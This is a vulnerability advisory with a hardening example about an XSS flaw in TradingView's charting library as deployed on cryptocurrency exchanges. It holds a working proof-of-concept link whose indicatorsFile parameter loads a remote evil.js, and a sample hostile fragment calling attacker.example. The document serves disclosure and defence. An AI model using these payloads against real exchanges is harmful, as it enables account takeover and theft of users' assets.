A security platform recently disclosed a high-risk vulnerability in TradingView. The RatingToken security team of the Cheetah Mobile Blockchain Security Center immediately assisted several partner digital currency exchanges in testing for and fixing the TradingView XSS vulnerability. The details are as follows:
Background:
TradingView, a free, open-source candlestick chart analysis tool, is widely used by digital currency and stock exchanges. An XSS vulnerability in it can bypass an exchange's existing defenses to compromise user accounts, and even to transfer users' assets at will.
Reproduction:
We found the vulnerability while testing an exchange's official website. Accessing https://www.***.com/assets/chart/charting_library/static, we traversed the directory and found the location of the vulnerability:
https://cdn-images-1.medium.com/max/800/1*WpGF4q_0_sOaxpdWhmLzaQ.png
/charting_library/static/tv-chart.630b704a2b991e1354cb09.html (the hash 630b704a2b991e1354cb09 may vary from site to site) references the script bundles/library.19c99ed5d03091e1354cb09.js (19c99ed5d03091e1354cb09 may likewise vary from site to site).
https://cdn-images-1.medium.com/max/800/1*HF_Fau77r2wOKHc2nudBjw.png
Accessing
https://www.***.com/assets/chart/charting_library/static/tvchart.630b704a2b9d0eaf1593.html#disabledFeatures=[]&enabledFeatures= []&indicatorsFile=https://***/evil.js
we can see in the picture below that the .js script has been triggered.
https://cdn-images-1.medium.com/max/800/1*juRxoQFhQmOr8zLyI2-gRA.png
Analysis:
The reproduction above shows that three parameters are required: disabledFeatures, enabledFeatures and indicatorsFile.
https://cdn-images-1.medium.com/max/800/1*lfXxWjPUAAUz0Wq-JyLkuA.png
The code shows that the disabledFeatures and enabledFeatures parameters were supplied in an invalid format, so they raised errors and had no effect.
indicatorsFile, the parameter that actually matters for the vulnerability, is used in the code as follows:
https://cdn-images-1.medium.com/max/800/1*edbiS4XlXfU28jqijaq8tg.png
$.getScript loads a JavaScript file from the server via an HTTP GET request and executes it.
If a victim clicks a link constructed as above, the attacker-supplied remote .js file is executed in the victim's session, which can lead to compromised user accounts, malicious wallet operations and asset loss.
Defense plan:
The temporary fix that users can apply themselves is to disable the indicatorsFile parameter in the .js file whose name starts with library, under the bundles directory of the TradingView library.
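To make the analysis and the fix concrete, here is an added JavaScript example written for this page (it is not TradingView's code, nor the exchange's). It contrasts the unvalidated handling of indicatorsFile described above, where the fragment value goes straight to the script loader, with a hardened version that honours the parameter only for a same-origin .js path under a fixed directory. The fragment parser, the function names, the origin https://exchange.example, the directory /assets/chart/indicators/ and the sample fragments are all constructed for the example, and a returned URL string stands in for the actual $.getScript call so that the code runs under Node without a browser.

```javascript
// Added example for this page, not TradingView's own code. It mirrors the
// flaw described in the analysis (indicatorsFile taken from the URL fragment
// and passed straight to a script loader) and shows one hardened alternative.
// All names and sample values below are constructed for illustration.

// Parse a URL fragment such as "#a=1&b=2" into a plain object.
function parseFragmentParams(hash) {
  const params = {};
  const body = hash.startsWith('#') ? hash.slice(1) : hash;
  for (const pair of body.split('&')) {
    if (!pair) continue;
    const idx = pair.indexOf('=');
    const key = idx === -1 ? pair : pair.slice(0, idx);
    const value = idx === -1 ? '' : pair.slice(idx + 1);
    try {
      params[decodeURIComponent(key)] = decodeURIComponent(value);
    } catch (e) {
      // Malformed percent-encoding: drop the pair rather than guess.
    }
  }
  return params;
}

// The vulnerable pattern: whatever indicatorsFile says becomes the script URL.
// Returns the URL that $.getScript would be called with (a stand-in for the
// real loader so this runs under Node).
function vulnerableIndicatorsUrl(hash) {
  const p = parseFragmentParams(hash);
  return p.indicatorsFile ? p.indicatorsFile : null;
}

// Hardened variant: resolve the value against the page origin and honour it
// only if it stays on the same origin, under a fixed directory, and names a
// .js file. Anything else returns null and no script is loaded.
function resolveIndicatorsFile(hash, pageOrigin, allowedDir = '/assets/chart/indicators/') {
  const p = parseFragmentParams(hash);
  if (!p.indicatorsFile) return null;
  let url;
  try {
    url = new URL(p.indicatorsFile, pageOrigin);
  } catch (e) {
    return null; // unparsable value
  }
  // new URL() already collapses "../" segments, so the pathname check below
  // also catches traversal attempts such as "indicators/../../x.js".
  if (url.origin !== new URL(pageOrigin).origin) return null; // cross-origin, incl. "//host/x.js"
  if (!url.pathname.startsWith(allowedDir)) return null;       // outside the allowed directory
  if (!url.pathname.endsWith('.js')) return null;               // not a script file
  return url.origin + url.pathname;                             // drop query and fragment
}

// Constructed sample inputs (not captured from any real exchange).
const SAMPLE_ORIGIN = 'https://exchange.example';
const SAMPLE_HOSTILE = '#disabledFeatures=[]&enabledFeatures=[]&indicatorsFile=https://attacker.example/evil.js';
const SAMPLE_BENIGN = '#disabledFeatures=[]&indicatorsFile=/assets/chart/indicators/custom.js';

console.log('vulnerable loader would fetch:', vulnerableIndicatorsUrl(SAMPLE_HOSTILE));
console.log('hardened, hostile input ->', resolveIndicatorsFile(SAMPLE_HOSTILE, SAMPLE_ORIGIN));
console.log('hardened, benign input  ->', resolveIndicatorsFile(SAMPLE_BENIGN, SAMPLE_ORIGIN));
```

The article's temporary fix, ignoring indicatorsFile entirely, is the stricter choice and the right one where no deployment needs custom indicator bundles; the allowlist above is for the case where the parameter must stay in use. A Content-Security-Policy with a restrictive script-src adds a second layer that does not depend on the application-level check being correct.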
RatingToken:
https://ratingtoken.io/?from=medium